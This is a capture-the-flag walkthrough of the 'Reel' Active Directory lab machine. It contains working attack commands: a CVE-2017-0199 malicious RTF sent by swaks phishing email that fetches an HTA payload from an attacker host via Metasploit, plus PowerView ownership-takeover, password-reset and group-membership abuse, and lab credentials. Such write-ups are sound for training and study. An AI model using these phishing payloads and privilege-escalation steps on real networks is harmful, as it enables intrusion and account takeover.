⇒ Reel is a hard Active Directory machine created by egre55 that teaches us :
- Recovering a password from a PSCredential object exported with Export-CliXml (DPAPI-protected, so it decrypts only as the user who exported it)
- Abusing WriteOwner on a user to take ownership, grant ourselves the ResetPassword right, and reset the password
- Abusing GenericWrite on a group to add ourselves to it
⇒ We are able to log in to FTP as the anonymous user and we find the following files :
- readme.txt has a note about sending emails with RTF documents attached
- Applocker.docx has hash rules that block certain file types
- Running exiftool on Windows Event Forwarding.docx we find an email address in the document metadata
CVE-2017-0199 [ malicious RTF ]
⇒ So we'll be sending an email to email@example.com with a malicious RTF attached; when opened, the RTF fetches our HTA payload, which we serve with Metasploit's hta_server module.
- Creating the HTA payload (SRVPORT is set to 80 so the URL the module prints matches the one we embed in the RTF; the module prints the random .hta name to use) :
use exploit/windows/misc/hta_server
set lhost tun0
set srvhost tun0
set srvport 80
set lport 4444
run
- Next we’ll be creating the malicious rtf file :
python cve-2017-0199_toolkit.py -M gen -t rtf -w jake.rtf -u 'http://10.10.14.8:80/5TktJBtnZ.hta'
- Next we'll send the mail to firstname.lastname@example.org using swaks, since we saw the SMTP port was open (swaks --header expects a full "Name: value" header line) :
swaks --server 10.10.10.77 --from email@example.com --to firstname.lastname@example.org --header "Subject: Please click" --body "Here is the document you requested http://10.10.14.8:80/5TktJBtnZ.hta" --attach jake.rtf
Privilege Escalation to tom
⇒ There is a cred.xml on nico's desktop, a PSCredential object exported with Export-CliXml. Its password is encrypted with DPAPI under nico's user key, so it can only be decrypted when running as nico on this host, which is exactly the context our shell gives us :
- We decrypted it with Import-CliXml and got the password for the tom user :
$credential = Import-CliXml -Path C:\Users\nico\Desktop\cred.xml
$credential.GetNetworkCredential().Password
Tom : 1ts-mag1c!!!
⇒ We ssh’ed in as tom using the credentials :
Privilege Escalation to claire
⇒ On tom's desktop we find some interesting files and a note saying there are no attack paths, but he only ran a shortest-path query. There's also an acls.csv file in the Ingestors folder, which we can load into BloodHound and enumerate ourselves.
⇒ Loaded it up in BloodHound and found that tom has WriteOwner over the claire user, and claire has GenericWrite over the Backup_Admins group.
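The point tom's note misses is that an ACL attack path is usually a chain of several edges, and a shortest-path query to one target won't show it. The Python below is an added example (not code from the original writeup or from the box) that walks abusable ACE edges in a BloodHound-style acls.csv and finds the chain tom -> claire -> Backup_Admins. It assumes the legacy BloodHound ACL ingestor column layout (ObjectName, ObjectType, PrincipalName, PrincipalType, ActiveDirectoryRights, ACEType, AccessControlType, IsInherited); the sample rows are constructed to mirror the box and are not the real acls.csv. It also handles two traps a naive grep falls into: AccessDenied ACEs are not edges, and ExtendedRight only helps when it is the force-password-reset right, not the ordinary change-password right that needs the old password.

```python
"""Find chained ACL abuse paths in a BloodHound-style acls.csv (added example)."""
import csv
import io
from collections import deque

# Assumed legacy ingestor column layout; check your own acls.csv header first.
# Constructed sample rows that mirror the Reel chain (not the box's real data).
SAMPLE_ACLS = """ObjectName,ObjectType,PrincipalName,PrincipalType,ActiveDirectoryRights,ACEType,AccessControlType,IsInherited
claire@HTB.LOCAL,USER,tom@HTB.LOCAL,USER,WriteOwner,,AccessAllowed,False
BACKUP_ADMINS@HTB.LOCAL,GROUP,claire@HTB.LOCAL,USER,GenericWrite,,AccessAllowed,False
tom@HTB.LOCAL,USER,tom@HTB.LOCAL,USER,ExtendedRight,User-Change-Password,AccessAllowed,False
claire@HTB.LOCAL,USER,HELPDESK@HTB.LOCAL,GROUP,ExtendedRight,User-Change-Password,AccessAllowed,False
ADMINISTRATOR@HTB.LOCAL,USER,tom@HTB.LOCAL,USER,GenericAll,,AccessDenied,False
ADMINISTRATOR@HTB.LOCAL,USER,DOMAIN ADMINS@HTB.LOCAL,GROUP,GenericAll,,AccessAllowed,False
"""

# Rights that give the principal control of the object: take ownership, rewrite
# the DACL, write any attribute (password / group membership), or everything.
TAKEOVER_RIGHTS = {"GenericAll", "GenericWrite", "WriteOwner", "WriteDacl", "Owner"}
# An ExtendedRight ACE is only an attack edge if it is the forced reset right
# (or a wildcard); User-Change-Password still needs the current password.
FORCE_RESET_ACE_TYPES = {"User-Force-Change-Password", "All"}


def abusable(right: str, ace_type: str) -> bool:
    """True when a single ACE right lets the principal take over the object."""
    if right in TAKEOVER_RIGHTS or right == "AllExtendedRights":
        return True
    if right == "ExtendedRight":
        return ace_type in FORCE_RESET_ACE_TYPES
    return False


def build_edges(csv_text: str) -> dict:
    """Map PRINCIPAL -> [(OBJECT, right)] for allowed, abusable, non-self ACEs."""
    edges = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["AccessControlType"] != "AccessAllowed":
            continue  # a deny ACE is never an attack edge
        principal = row["PrincipalName"].upper()
        target = row["ObjectName"].upper()
        if principal == target:
            continue  # rights on yourself add nothing to a path
        # ActiveDirectoryRights may list several flags, comma separated
        for right in (r.strip() for r in row["ActiveDirectoryRights"].split(",")):
            if abusable(right, row["ACEType"]):
                edges.setdefault(principal, []).append((target, right))
    return edges


def find_path(edges: dict, start: str, goal: str):
    """Breadth-first search for the shortest chain of abusable ACEs.

    Returns [(node, right_used_to_reach_it), ...] starting with (start, None),
    or None when goal is not reachable from start.
    """
    start, goal = start.upper(), goal.upper()
    queue = deque([[(start, None)]])
    seen = {start}
    while queue:
        path = queue.popleft()
        node = path[-1][0]
        if node == goal:
            return path
        for target, right in edges.get(node, []):
            if target not in seen:
                seen.add(target)
                queue.append(path + [(target, right)])
    return None


def reachable(edges: dict, start: str) -> set:
    """Every object start can take over transitively: the full picture a
    single shortest-path query does not show."""
    start = start.upper()
    seen, stack = set(), [start]
    while stack:
        node = stack.pop()
        for target, _ in edges.get(node, []):
            if target not in seen:
                seen.add(target)
                stack.append(target)
    return seen


if __name__ == "__main__":
    graph = build_edges(SAMPLE_ACLS)
    path = find_path(graph, "tom@htb.local", "backup_admins@htb.local")
    for node, right in path:
        print(f"{'  via ' + right + ' -> ' if right else ''}{node}")
    print("tom can reach:", sorted(reachable(graph, "tom@htb.local")))
```

Running it prints the two-hop chain (claire via WriteOwner, then BACKUP_ADMINS via GenericWrite) and shows that the denied GenericAll on Administrator and the HELPDESK change-password right contribute nothing, which is the difference between "no attack paths" and the route used below.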
⇒ Abusing WriteOwner: make tom the owner of claire, then, since an object's owner can edit its DACL, grant tom the ResetPassword right and reset claire's password. These are PowerView cmdlets, so PowerView has to be imported into the session first :
# Take ownership of claire
Set-DomainObjectOwner -Identity claire -OwnerIdentity tom
# As owner, grant tom the right to force a password reset on claire
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword
# Reset the password
$newpass = ConvertTo-SecureString -String 'P@$$w0rd!1234' -AsPlainText -Force
Set-DomainUserPassword -Identity claire -AccountPassword $newpass
⇒ Then we just SSH'ed in as claire with the new password :
Privilege Escalation to Administrator
⇒ As we saw earlier, claire has GenericWrite over the backup_admins group, so let's add our user to it :
net group backup_admins claire /add
- Group membership is evaluated at logon, so claire's current session does not carry the new group. We go back to tom, run the reset password commands again and SSH in as claire once more to get a fresh token.
⇒ Now we are able to read files in the Administrator folder, but we still can't read the root flag. There's a folder Backup Scripts which contains a couple of PowerShell scripts, and one of them has the Administrator password hardcoded :
administrator : Cr4ckMeIfYouC4n!
⇒ We SSH'ed in as Administrator and grabbed the root flag.